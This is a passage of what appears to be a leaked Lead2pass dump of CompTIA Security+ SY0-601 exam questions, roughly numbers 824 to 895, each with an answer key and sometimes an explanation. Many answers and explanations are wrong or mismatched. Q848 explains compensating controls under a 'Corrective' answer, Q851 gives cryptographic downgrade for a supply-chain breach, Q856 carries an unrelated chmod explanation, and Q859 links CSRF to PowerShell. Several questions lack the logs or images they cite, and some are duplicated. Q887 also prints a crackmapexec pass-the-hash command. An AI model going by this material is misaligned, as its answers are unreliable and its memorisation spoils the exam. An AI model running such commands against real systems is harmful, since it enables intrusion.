A. Set up hashing on the source log file servers that complies with local regulatory requirements,
B. Back up the aggregated log files at least two times a day or as stated by local regulatory
requirements.
C. Write protect the aggregated log files and move them to an isolated server with limited access.
D. Back up the source log files and archive them for at least six years or in accordance with local
regulatory requirements.
Answer: A
Explanation:
Log File Integrity Validation in AWS
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
289
This feature informs you on any modifications or deletions to CloudTrail logs. By using SHA-256
for hashing and SHA-256 with RSA for digital signing, AWS claims, “This makes it
computationally infeasible to modify, delete, or forge CloudTrail log files without detection.”
QUESTION 825
A company recently experienced an inside attack using a corporate machine that resulted in data
compromise. Analysis indicated an unauthorized change to the software circumvented
technological protection measures. The analyst was tasked with determining the best method to
ensure the integrity of the systems remains intact and local and remote boot attestation can take
place. Which of the following would provide the BEST solution?
A.
B.
C.
D.
HIPS
FIM
TPM
DLP
Answer: C
Explanation:
In this question, an attack has already occurred so preventative measures such as HIPS, FIM, or
DLP would not be helpful. Also, the analyst wants to check the integrity of the system, and boot
attestation can take place. TPM chips have mechanisms to prevent system tampering and boot
attestation can be done with TPM based hardware to verify the state of the firmware, bootloader,
etc. TPM is the best option here.
HIPS (Host Intrustion Prevention System) - An installed software package which monitors a
single host for suspicious activity by analyzing events occurring within that host. This aims to stop
malware by monitoring the behavior of code.
FIM (File Integrity Monitoring) - Technology that monitors and detects file changes that could be
indicative of a cyberattack. FIM specifically involves examining files to see if and when they
change, how they change, who changed them, and what can be done to restore those files if
those modifications are unauthorized.
DLP (Data Loss Prevention) - A set of tools and processes used to ensure that sensitive data is
not lost, misused, or accessed by unauthorized users.
QUESTION 826
A SOC operator is receiving continuous alerts from multiple Linux systems indicating that
unsuccessful SSH attempts to a functional user ID have been attempted on each one of them in a
short period of time. Which of the following BEST explains this behavior?
A.
B.
C.
D.
Rainbow table attack
Password spraying
Logic bomb
Malware bot
Answer: B
Explanation:
Password Spraying is a variant of what is known as a brute force attack. In a traditional brute
force attack, the perpetrator attempts to gain unauthorized access to a single account by
guessing the password "repeatedly" in a very short period of time.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
290
QUESTION 827
Which of the following social engineering attacks BEST describes an email that is primarily
intended to mislead recipients into forwarding the email to others?
A.
B.
C.
D.
Hoaxing
Pharming
Watering-hole
Phishing
Answer: A
Explanation:
A virus hoax is a false warning about a computer virus. Typically, the warning arrives in an email
note or is distributed through a note in a company's internal network. These notes are usually
forwarded using distribution lists, and they will typically suggest that the recipient forward the note
to other distribution lists.
QUESTION 828
Which of the following can work as an authentication method and as an alerting mechanism for
unauthorized access attempts?
A.
B.
C.
D.
E.
Smart card
Push notifications
Attestation service
HMAC based
one-time password
Answer: B
Explanation:
It's like the google notification, is a MFA - give you push notifications to authenticate and alert you
on someone is trying to log in your account.
QUESTION 829
Which of the following is a risk that is specifically associated with hosting applications in the
public cloud?
A.
B.
C.
D.
Unsecured root accounts
Zero-day
Shared tenancy
Insider threat
Answer: C
Explanation:
In a multi-tenant environment, such as the cloud, a “container” vulnerability can allow an attacker
to compromise containers of other tenants on the same host. Flaws in chip design can also result
in the compromise of tenant information in the cloud through side-channel attacks.
QUESTION 830
Which of the following is an effective tool to stop or prevent the exfiltration of data from a
network?
A. DLP
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
291
B. NIDS
C. TPM
D. FDE
Answer: A
Explanation:
Data loss prevention (DLP) makes sure that users do not send sensitive or critical information
outside the corporate network.
QUESTION 831
During a recent security incident at a multinational corporation a security analyst found the
following logs for an account called user:
Which Of the following account policies would BEST prevent attackers from logging in as user?
A.
B.
C.
D.
Impossible travel time
Geofencing
Time based logins
Geolocation
Answer: A
Explanation:
Impossible Travel is a calculation made by comparing a user's last known location to their current
location, then assessing whether the trip is likely or even possible in the time that elapsed
between the two measurements.
It can calculate the time it would take to travel from New York to Los Angeles and see it would be
impossible to accomplish this within a minute.
QUESTION 832
An attacker has successfully exfiltrated several non salted password hashes from an online
system.
Given the logs below:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
292
Which of the following BEST describes the type of password attack the attacker is performing?
A.
B.
C.
D.
Dictionary
Pass the hash
Brute force
Password spraying
Answer: A
QUESTION 833
A security analyst wants to reference a standard to develop a risk management program. Which
of the following is the BEST source for the analyst to use?
A.
B.
C.
D.
SSAE SOC 2
ISO 31000
NIST CSF
GDPR
Answer: B
Explanation:
ISO 31000 The ISO 31000 Risk Management framework is an international standard that
provides businesses with guidelines and principles for risk management from the International
Organization for Standardization. Regulatory compliance initiatives are usually specific to a
particular country and applicable to certain sized businesses or businesses in specific industries.
However, ISO 31000 is designed to be used in organizations of any size. Its concepts work
equally well in the public and the private sector, in large or small businesses and nonprofit
organizations.
QUESTION 834
Against the recommendation of the IT security analyst, a company set all user passwords on a
server as `P@55w0rD`. Upon review of the /etc/passwd file, an attacker found the following:
alice:a8df3b6c4fd75f0617431fd248f35191df8d237f
bob:2d250c5b2976b03d757f324ebd59340df96aa05e
chris:ea981ec3285421d014108089f3f3f997ce0f4150
Which of the following BEST explains why the encrypted passwords do not match?
A. Perfect forward secrecy
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
293
B. Key stretching
C. Salting
D. Hashing
Answer: C
Explanation:
Salting refers to adding random data to the input of a hash function to guarantee a unique output.
The set password, in this case, is already hashed so to further secure it salting is the next step in
cryptography i.e. adding more security to the password. Think of it as "salt bae" making it just that
much better.
QUESTION 835
The Chief Information Security Officer is concerned about employees using personal email rather
than company email to communicate with clients and sending sensitive business information and
PII. Which of the following would be the BEST solution to install on the employees' workstations
to prevent information from leaving the company's network?
A.
B.
C.
D.
HIPS
DLP
HIDS
EDR
Answer: B
Explanation:
DLP enables businesses to detect data loss, as well as prevent the illicit transfer of data outside
the organization and the unwanted destruction of sensitive or personally identifiable data (PII).
QUESTION 836
On the way into a secure building, an unknown individual strikes up a conversation with an
employee. The employee scans the required badge at the door while the unknown individual
holds the door open, seemingly out of courtesy, for the employee. Which of the following social
engineering techniques is being utilized?
A.
B.
C.
D.
Shoulder surfing
Watering-hole attack
Tailgating
Impersonation
Answer: C
Explanation:
Tailgating is following someone who has access to a secure into that area without having access
yourself.
Shoulder surfing is looking at information that someone who has access to it is looking at over
their shoulder /while they have it open to view when you shouldn't otherwise have access to that
information. This sounds more like Tailgating than Shoulder surfing for sure.
QUESTION 837
Two hospitals merged into a single organization. The privacy officer requested a review of all
records to ensure encryption was used during record storage, in compliance with regulations.
During the review, the officer discovered that medical diagnosis codes and patient names were
left unsecured. Which of the following types of data does this combination BEST represent?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
294
A.
B.
C.
D.
Personal health information
Personally identifiable information
Tokenized data
Proprietary data
Answer: A
Explanation:
Protected health information PHI is a subset of PII, but it specifically refers to health information
shared with HIPAA covered entities. Medical records, lab reports, and hospital bills are PHI, along
with any information relating to an individual’s past, present, or future physical or mental health.
QUESTION 838
A security analyst has been tasked with ensuring all programs that are deployed into the
enterprise have been assessed in a runtime environment. Any critical issues found in the program
must be sent back to the developer for verification and remediation. Which of the following BEST
describes the type of assessment taking place?
A.
B.
C.
D.
Input validation
Dynamic code analysis
Fuzzing
Manual code review
Answer: B
Explanation:
Dynamic analysis means that the application is tested under "real world" conditions using a
staging environment.
QUESTION 839
A security analyst is reviewing the vulnerability scan report for a web server following an incident.
The vulnerability that was used to exploit the server is present in historical vulnerability scan
reports, and a patch is available for the vulnerability. Which of the following is the MOST likely
cause?
A.
B.
C.
D.
Security patches were uninstalled due to user impact.
An adversary altered the vulnerability scan reports
A zero-day vulnerability was used to exploit the web server
The scan reported a false negative for the vulnerability
Answer: A
Explanation:
It is not zero day because there is a patch released for that vulnerability, not because "if it was a
zero day vulnerability, it wouldn't show up in vulnerability scan" argument. A company using an
app can spot a vulnerability, or a vendor that developed the app could be well aware of a
vulnerability, but if it hasn't released a patch for that, it still remains as a zero day vulnerability.
QUESTION 840
Which of the following BEST describes the process of documenting who has access to evidence?
A. Order of volatility
B. Chain of custody
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
295
C. Non-repudiation
D. Admissibility
Answer: B
Explanation:
A chain of custody is a chronological paper trail documenting when, how, and by whom individual
items of physical or electronic evidence - such as cell phone logs - were collected, handled,
analyzed, or otherwise controlled during an investigation.
QUESTION 841
A systems engineer wants to leverage a cloud-based architecture with low latency between
network-connected devices that also reduces the bandwidth that is required by performing
analytics directly on the endpoints. Which of the following would BEST meet the requirements?
(Choose two.)
A.
B.
C.
D.
E.
F.
Private cloud
SaaS
Hybrid cloud
IaaS
DRaaS
Fog computing
Answer: CF
Explanation:
Many people use the terms fog computing and edge computing interchangeably because both
involve bringing intelligence and processing closer to where the data is created.
Fog computing is a distributed form of cloud computing, in which the workload is performed on a
distributed, decentralized architecture. Originally developed by Cisco, fog computing moves some
of the work into the local space to manage latency issues, with the cloud being
less synchronous. In this form, it is similar to edge computing, which is described in the next
section.
QUESTION 842
Which of the following is a policy that provides a greater depth and breadth of knowledge across
an organization?
A.
B.
C.
D.
Asset management policy
Separation of duties policy
Acceptable use policy
Job rotation policy
Answer: D
Explanation:
The question was talking about gaining knowledge across the organization "gaining knowledge in
every department" the only way that can be done is through job rotation.
QUESTION 843
A company acquired several other small companies. The company that acquired the others is
transitioning network services to the cloud. The company wants to make sure that performance
and security remain intact. Which of the following BEST meets both requirements?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
296
A.
B.
C.
D.
High availability
Application security
Segmentation
Integration and auditing
Answer: D
Explanation:
The integration of the appropriate level and quantity of security controls is a subject that is always
being audited. Are the controls appropriate? Are they placed and used correctly? Most
importantly, are they effective? These are standard IT audit elements in the enterprise. The
moving of computing resources to the cloud does not change the need or intent of audit functions.
QUESTION 844
A security engineer must deploy two wireless routers in an office suite. Other tenants in the office
building should not be able to connect to this wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST
encryption?
A.
B.
C.
D.
WPS
WPA2
WAP
HTTPS
Answer: B
QUESTION 845
A company recently decided to allow its employees to use their personally owned devices for
tasks like checking email and messaging via mobile applications. The company would like to use
MDM, but employees are concerned about the loss of personal data. Which of the following
should the IT department implement to BEST protect the company against company data loss
while still addressing the employees’ concerns?
A.
B.
C.
D.
Enable the remote-wiping option in the MDM software in case the phone is stolen.
Configure the MDM software to enforce the use of PINs to access the phone.
Configure MDM for FDE without enabling the lock screen.
Perform a factory reset on the phone before installing the company's applications.
Answer: B
QUESTION 846
A penetration tester is brought on site to conduct a full attack simulation at a hospital. The
penetration tester notices a WAP that is hanging from the drop ceiling by its cabling and is
reachable. Which of the following recommendations would the penetration tester MOST likely
make given this observation?
A.
B.
C.
D.
Employ a general contractor to replace the drop-ceiling tiles.
Place the network cabling inside a secure conduit.
Secure the access point and cabling inside the drop ceiling.
Utilize only access points that have internal antennas
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
297
Answer: C
QUESTION 847
A security engineer is concerned that the strategy for detection on endpoints is too heavily
dependent on previously defined attacks. The engineer would like a tool to monitor for changes to
key files and network traffic on the device.
Which of the following tools BEST addresses both detection and prevention?
A.
B.
C.
D.
NIDS
HIPS
AV
NGFW
Answer: B
Explanation:
A host-based intrusion prevention system (HIPS) is a system or a program employed to protect
critical computer systems containing crucial data against viruses and other Internet malware.
Starting from the network layer all the way up to the application layer, HIPS protects from known
and unknown malicious attacks.
QUESTION 848
An organization is repairing the damage after an incident. Which of the following controls is being
implemented?
A.
B.
C.
D.
Detective
Preventive
Corrective
Compensating
Answer: C
Explanation:
A compensating control, also called an alternative control, is a mechanism that is put in place to
satisfy the requirement for a security measure that is deemed too difficult or impractical to
implement at the present time.
QUESTION 849
An organization is tuning SIEM rules based off of threat intelligence reports. Which of the
following phases of the incident response process does this scenario represent?
A.
B.
C.
D.
Lessons learned
Eradication
Recovery
Preparation
Answer: D
Explanation:
The preparation phase is when the organization is preparing for the attack. Tuning the SIEM is
just providing the latest threat information to the system for preparation.
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
298
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for
a future incident.
QUESTION 850
A security team suspects that the cause of recent power consumption overloads is the
unauthorized use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets
available?
A.
B.
C.
D.
Adding a new UPS dedicated to the rack
Installing a managed PDU
Using only a dual power supplies unit
Increasing power generator capacity
Answer: B
Explanation:
Managed power distribution units provide the supply of energy, remote control over individual
outlets (switching on/off) thus enable server restart and further monitoring of energy consumption
from individual outlets.
QUESTION 851
A company recently experienced a major breach. An investigation concludes that customer credit
card data was stolen and exfiltrated through a dedicated business partner connection to a vendor,
who is not held to the same security control standards.
Which of the following is the MOST likely source of the breach?
A.
B.
C.
D.
Side channel
Supply chain
Cryptographic downgrade
Malware
Answer: C
QUESTION 852
A systems engineer is building a new system for production. Which of the following is the FINAL
step to be performed prior to promoting to production?
A.
B.
C.
D.
Disable unneeded services.
Install the latest security patches.
Run a vulnerability scan.
Encrypt all disks.
Answer: C
QUESTION 853
The Chief information Security Officer has directed the security and networking team to retire the
use of shared passwords on routers and switches.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
299
Which of the following choices BEST meets the requirements?
A.
B.
C.
D.
SAML
TACACS+
Password vaults
OAuth
Answer: B
QUESTION 854
A store receives reports that shoppers' credit card information is being stolen. Upon further
analysis, those same shoppers also withdrew money from an ATM in that store. The attackers
are using the targeted shoppers' credit card information to make online purchases.
Which of the following attacks is the MOST probable cause?
A.
B.
C.
D.
Identity theft
RFID cloning
Shoulder surfing
Card skimming
Answer: D
QUESTION 855
Which of the following controls would be the MOST cost-effective and time-efficient to deter
intrusions at the perimeter of a restricted, remote military training area? (Choose two.)
A.
B.
C.
D.
E.
F.
G.
Barricades
Thermal sensors
Drones
Signage
Motion sensors
Guards
Bollards
Answer: AE
QUESTION 856
A Chief Information Officer is concerned about employees using company-issued laptops lo steal
data when accessing network shares. Which of the following should the company Implement?
A.
B.
C.
D.
E.
DLP
CASB
HIDS
EDR
UEFI
Answer: A
Explanation:
Chmod removes the setuido permission, that is, it removes the S bit. Setuido is the specific
permission, but it is removed with Chmod.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
300
https://www.cbtnuggets.com/blog/technology/system-admin/linux-file-permissions-understandingsetuid-setgid-and-the-sticky-bit
QUESTION 857
A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares. Which of the following should the company implement?
A.
B.
C.
D.
E.
DLP
CASB
HIDS
EDR
UEFI
Answer: A
QUESTION 858
A company's public-facing website, https://www.organization.com, has an IP address of
166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage
displaying incorrect information. A quick nslookup search shows https://www.organization.com is
pointing to 151.191.122.115. Which of the following is occurring?
A.
B.
C.
D.
DoS attack
ARP poisoning
DNS spoofing
NXDOMAIN attack
Answer: C
QUESTION 859
A security analyst reviews web server logs and notices the following lines:
Which of the following vulnerabilities is the attacker trying to exploit?
A.
B.
C.
D.
Token reuse
SQLi
CSRF
XSS
Answer: C
Explanation:
Get command is Powershell = CSRF use Powershell
XSS =Javascript
QUESTION 860
A Chief information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares. Which of the following should the company implement?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
301
A.
B.
C.
D.
E.
DLP
CASB
HIDS
EDR
UEFI
Answer: A
QUESTION 861
A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
Which of the following types of attacks is being attempted and how can it be mitigated?
A.
B.
C.
D.
XSS, implement a SIEM
CSRF, implement an IPS
Directory traversal implement a WAF
SQL infection, implement an IDS
Answer: C
QUESTION 862
Employees at a company are receiving unsolicited text messages on their corporate cell phones.
The unsolicited text messages contain a password reset Link.
Which of the attacks is being used to target the company?
A.
B.
C.
D.
Phishing
Vishing
Smishing
Spam
Answer: C
Explanation:
Smishing is a type of phishing attack which begins with an attacker sending a text message to an
individual. The message contains social engineering tactics to convince the person to click on a
malicious link or send sensitive information to the attacker. Criminals use smishing attacks for
purposes like:
Learn login credentials to accounts via credential phishing
Discover private data like social security numbers
Send money to the attacker
Install malware on a phone
Establish trust before using other forms of contact like phone calls or emails
Attackers may pose as trusted sources like a government organization, a person you know, or
your bank. And messages often come with manufactured urgency and time-sensitive threats. This
can make it more difficult for a victim to notice a scam.
Phone numbers are easy to spoof with VoIP texting, where users can create a virtual number to
send and receive texts. If a certain phone number is flagged for spam, criminals can simply
recycle it and use a new one.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
302
QUESTION 863
Which of the following involves the inclusion of code in the main codebase as soon as it is
written?
A.
B.
C.
D.
Continuous monitoring
Continuous deployment
Continuous Validation
Continuous integration
Answer: D
Explanation:
Continuous integration - is the practice of automating the integration of code changes from
multiple contributors into a single software project
Continuous integration puts a great emphasis on testing automation to check that the application
is not broken whenever new commits are integrated into the main branch.
QUESTION 864
An information security manager for an organization is completing a PCI DSS self-assessment for
the first time. Which of the is following MOST likely reason for this type of assessment?
A.
B.
C.
D.
An international expansion project is currently underway.
Outside consultants utilize this tool to measure security maturity.
The organization is expecting to process credit card information.
A government regulator has requested this audit to be completed
Answer: C
QUESTION 865
A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of
the following solutions should the engineer implement FIRST? (Choose two.)
A.
B.
C.
D.
E.
F.
G.
Auto-update
HTTP headers
Secure cookies
Third-party updates
Full disk encryption
Sandboxing
Hardware encryption
Answer: AC
Explanation:
Auto-update is a solution that automatically installs security patches and updates to applications.
This helps to ensure that applications are always up to date with the latest security patches,
which can help to reduce the risk of vulnerabilities being exploited.
Secure cookies are cookies that are encrypted and signed. This helps to protect the cookies from
being tampered with or stolen by attackers.
QUESTION 866
A security analyst reviews a company's authentication logs and notices multiple authentication
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
303
failures. The authentication failures are from different usernames that share the same source IP
address. Which of the password attacks is MOST likely happening?
A.
B.
C.
D.
Dictionary
Rainbow table
Spraying
Brute-force
Answer: C
Explanation:
In a password spraying attack, an attacker tries a list of common passwords against a large
number of accounts. The attacker does not attempt to authenticate with each account multiple
times, but rather tries a single password against a large number of accounts. This type of attack
is often used against organizations with a large number of users, as it can be more efficient than
trying to brute-force each account individually.
In this case, the security analyst notices multiple authentication failures from different usernames
that share the same source IP address. This is a strong indicator that a password spraying attack
is taking place.
QUESTION 867
An employee received multiple messages on a mobile device. The messages instructing the
employee to pair the device to an unknown device. Which of the following BEST describes What
a malicious person might be doing to cause this issue to occur?
A.
B.
C.
D.
Jamming
Bluesnarfing
Evil twin
Rogue access point
Answer: B
QUESTION 868
A network engineer and a security engineer are discussing ways to monitor network operations.
Which of the following is the BEST method?
A.
B.
C.
D.
Disable Telnet and force SSH.
Establish a continuous ping.
Utilize an agentless monitor.
Enable SNMPv3 With passwords.
Answer: D
QUESTION 869
Which of the following authentication methods is considered to be the LEAST secure?
A.
B.
C.
D.
TOTP
SMS
HOTP
Token key
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
304
Answer: B
QUESTION 870
Which of the following incident response steps occurs before containment?
A.
B.
C.
D.
Eradication
Recovery
Lessons learned
Identification
Answer: D
QUESTION 871
Which of the following BEST describes data streams that are compiled through artificial
intelligence that provides insight on current cyber intrusions, phishing, and other malicious cyber
activity?
A.
B.
C.
D.
Intelligence fusion
Review reports
Log reviews
Threat feeds
Answer: D
Explanation:
Threat feeds are information sources that provide real-time or near real-time data on security
threats. These feeds can come from a variety of sources, including commercial vendors, open
source projects, and government agencies. IT feeds can be used to help organizations detect and
respond to security threats more quickly and effectively.
QUESTION 872
Which of the technologies is used to actively monitor for specific file types being transmitted on
the network?
A.
B.
C.
D.
File integrity monitoring
Honeynets
Tcpreplay
Data loss prevention
Answer: D
QUESTION 873
As part of the building process for a web application, the compliance team requires that all PKI
certificates are rotated annually and can only contain wildcards at the secondary subdomain
level. Which of the following certificate properties will meet these requirements?
A.
B.
C.
D.
https://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
https://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
https://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
https://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
305
Answer: C
Explanation:
* - secondary subdomain
app1 - subdomain
comptia - domain
QUESTION 874
A security administrator wants to implement a program that tests a user's ability to recognize
attacks over the organization's email system.
Which of the following would be BEST suited for this task?
A.
B.
C.
D.
Social media analysis
Annual information security training
Gamification
Phishing campaign
Answer: D
Explanation:
Phishing campaign is best suited for testing a user's ability to recognize attacks over the
organization's email system. Phishing is a social engineering technique used by attackers to trick
users into divulging sensitive information, such as login credentials or personal information. By
launching a simulated phishing campaign, a security administrator can test whether employees
are able to identify and avoid phishing attempts. This can help to raise awareness about the
dangers of phishing and improve the overall security posture of the organization.
QUESTION 875
A third party asked a user to share a public key for secure communication. Which of the following
file formats should the user choose to share the key?
A.
B.
C.
D.
.pfx
.csr
.pvk
.cer
Answer: D
Explanation:
A public key is typically shared in the form of a certificate, which is a digital document that
contains the public key and some information about its owner. The .cer file format is commonly
used for X.509 certificates, which are a widely accepted standard for digital certificates.
QUESTION 876
A security analyst needs an overview of vulnerabilities for a host on the network.
Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable
services are running?
A.
B.
C.
D.
Non-credentialed
Web application
Privileged
Internal
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
306
Answer: D
QUESTION 877
Which of the following identifies the point in time when an organization will recover data in the
event of an outage?
A.
B.
C.
D.
ALE
RPO
MTBF
ARO
Answer: B
QUESTION 878
Which of the following is required in order for an IDS and a WAF to be effective on https traffic?
A.
B.
C.
D.
Hashing
DNS sinkhole
TLS inspection
Data masking
Answer: C
QUESTION 879
Which of the following BEST describes a technique that compensates researchers for finding
vulnerabilities?
A.
B.
C.
D.
Penetration testing
Code review
Wardriving
Bug bounty
Answer: D
QUESTION 880
A security architect is implementing a new email architecture for a company. Due to security
concerns, the Chief Information Security Officer would like the new architecture to support email
encryption, as well as provide for digital signatures. Which of the following should the architect
implement?
A.
B.
C.
D.
TOP
IMAP
https
S/MIME
Answer: D
QUESTION 881
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
307
Which of the following controls would provide the BEST protection against tailgating?
A.
B.
C.
D.
Access control vestibule
Closed-circuit television
Proximity card reader
Faraday cage
Answer: A
Explanation:
It's a textbook definition of an access control vestibule. Most access controls can be overcome by
social engineering techniques.
QUESTION 882
A security engineer is reviewing the logs from a SAML application that is configured to use MFA,
during this review the engineer notices a high volume of successful logins that did not require
MFA from users who were traveling internationally. The application, which can be accessed
without a VPB, has a policy that allows time-based tokens to be generated. Users who changed
locations should be required to reauthenticate but have been Which of the following statements
BEST explains the issue?
A.
B.
C.
D.
OpenID is mandatory to make the MFA requirements work
An incorrect browser has been detected by the SAML application
The access device has a trusted certificate installed that is overwriting the session token
The user's IP address is changing between logins, bur the application is not invalidating the
token
Answer: D
QUESTION 883
The help desk has received calls from users in multiple locations who are unable to access core
network services The network team has identified and turned off the network switches using
remote commands. Which of the following actions should the network team take NEXT?
A.
B.
C.
D.
Disconnect all external network connections from the firewall
Send response teams to the network switch locations to perform updates
Turn on all the network switches by using the centralized management software
Initiate the organization's incident response plan.
Answer: D
Explanation:
In the given scenario, since multiple locations are affected, and the network team has identified
and turned off the network switches, it suggests a widespread network issue that could have
been caused by an attack or a major network fault. Therefore, the next action the network team
should take is to initiate the organization's incident response plan. This plan will help them identify
the cause of the problem and respond appropriately to minimize the impact and restore normal
operations as quickly as possible.
QUESTION 884
A security researcher is using an adversary's infrastructure and HTTPs and creating a named
group to track those targeted.
Which of the following is the researcher MOST likely using?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
308
A.
B.
C.
D.
The Cyber Kill Chain
The incident response process
The Diamond Model of Intrusion Analysis
MITRE ATT&CK
Answer: C
QUESTION 885
The compliance team requires an annual recertification of privileged and non-privileged user
access. However, multiple users who left the company six months ago still have access. Which of
the following would have prevented this compliance violation?
A.
B.
C.
D.
Account audits
AUP
Password reuse
SSO
Answer: A
Explanation:
Account audits are periodic reviews of user accounts to ensure that they are being used
appropriately and that access is being granted and revoked in accordance with the organization's
policies and procedures. If the compliance team had been conducting regular account audits,
they would have identified the users who left the company six months ago and ensured that their
access was revoked in a timely manner. This would have prevented the compliance violation
caused by these users still having access to the company's systems.
To prevent this compliance violation, the company should implement account audits. An account
audit is a regular review of all user accounts to ensure that they are being used properly and that
they are in compliance with the company's security policies. By conducting regular account
audits, the company can identify inactive or unused accounts and remove access for those users.
This will help to prevent compliance violations and ensure that only authorized users have access
to the company's systems and data.
QUESTION 886
Which of the following roles would MOST likely have direct access to the senior management
team?
A.
B.
C.
D.
Data custodian
Data owner
Data protection officer
Data controller
Answer: C
Explanation:
The Data Protection Officer (DPO) is responsible for overseeing an organization's data protection
strategy and implementation to ensure compliance with applicable laws and regulations. The
DPO acts as an independent advisor to the senior management team and has direct access to
them. The DPO also serves as a liaison between the organization and regulatory authorities on
matters related to data protection. Therefore, the DPO is most likely to have direct access to the
senior management team.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
309
QUESTION 887
During a forensic investigation, a security analyst discovered that the following command was run
on a compromised host:
crackmapexec smb 192.168.10.232 -u localadmin -H
0A3CE8D07A46E5C51070F03593E0A5E6
Which of the following attacks occurred?
A.
B.
C.
D.
Buffer overflow
Pass the hash
SQL injection
Replay attack
Answer: B
Explanation:
The command crackmapexec smb is a tool used to perform attacks against SMB (Server
Message Block) services running on Windows operating systems. The -u flag specifies a user
account to use for authentication, and the -H flag specifies a password hash. In this case, the
attacker used a password hash to authenticate as the localadmin user, without actually knowing
the password. This technique is called Pass the Hash and is often used by attackers to escalate
privileges or move laterally within a network.
QUESTION 888
A user attempts to load a web-based application, but the expected login screen does not appear.
A help desk analyst troubleshoots the issue by running the following command and reviewing the
output on the user's PC:
user> nalookup software-solution.com
Server: rogue.comptia.com
Address: 172.16.1.250
Non-authoritative answer:
Name: software-solution.com Address: 10.20.10.10
The help desk analyst then runs the same command on the local PC:
helpdesk> nslookup software-solution.com
Server: dns.comptia.com Address: 172.16.1.1
Non-authoritative answer:
Name: software-solution.com Address: 172.16.1.10
Which of the following BEST describes the attack that is being detected?
A.
B.
C.
D.
Domain hijacking
DNS poisoning
MAC flooding
Evil twin
Answer: B
QUESTION 889
Hotspot Question
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
310
You received the output of a recent vulnerability assessment.
Review the assessment and scan output and determine the appropriate remediation(s) for each
device.
Remediation options may be selected multiple times, and some devices may require more than
one remediation.
If at any time you would like to bring bade the initial state to the simulation, please click me Reset
All button.
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
311
QUESTION 890
A business is looking for a cloud service provider that offers a la carte services, including cloud
backups, VM elasticity, and secure networking. Which of the following cloud service provider
types should the business engage?
A.
B.
C.
D.
IaaS
PaaS
XaaS
SaaS
Answer: C
Explanation:
"A la carte" service means you can get any service you want from what the provider offers.
QUESTION 891
A security analyst notices that specific files are being deleted each time a systems administrator
is on vacation. Which of the following BEST describes the type of malware that is running?
A. Fileless virus
B. Logic bomb
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
312
C. Keylogger
D. Ransomware
Answer: B
QUESTION 892
Which of the following can reduce vulnerabilities by avoiding code reuse?
A.
B.
C.
D.
Memory management
Stored procedures
Normalization
Code obfuscation
Answer: D
Explanation:
This will ensure other programmers are unable to reuse your code thereby reducing
vulnerabilities in others code.
QUESTION 893
A security administrator needs to block a TCP connection using the corporate firewall. Because
this connection is potentially a threat, the administrator does not want to send back an RST.
Which of the following actions in the firewall rule would work BEST?
A.
B.
C.
D.
Drop
Reject
Log alert
Permit
Answer: A
Explanation:
In the Drop action, no message is sent describing why the package was dropped. In the Reject
action, a message is sent to the source describing the reason for the rejection.
QUESTION 894
A security team discovered a large number of company-issued devices with non-work-related
software installed. Which of the following policies would MOST likely contain language that would
prohibit this activity?
A.
B.
C.
D.
NDA
BPA
AUP
SLA
Answer: C
Explanation:
An acceptable use policy (AUP) is a document stipulating constraints and practices that a user
must agree to for access to a corporate network, the internet or other resources.
QUESTION 895
A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
313
computer's operating system has been hardened and tested. A security engineer is concerned
that someone could use removable media to install a rootkit. Which of the following should the
security engineer configure to BEST protect the kiosk computer?
A.
B.
C.
D.
Measured boot
Boot attestation
UEFI
EDR
Answer: A
Explanation:
Measured Boot is a new feature of Windows 8 that was created to help better protect your
machine from rootkits and other malware. Measured Boot will check each start up component
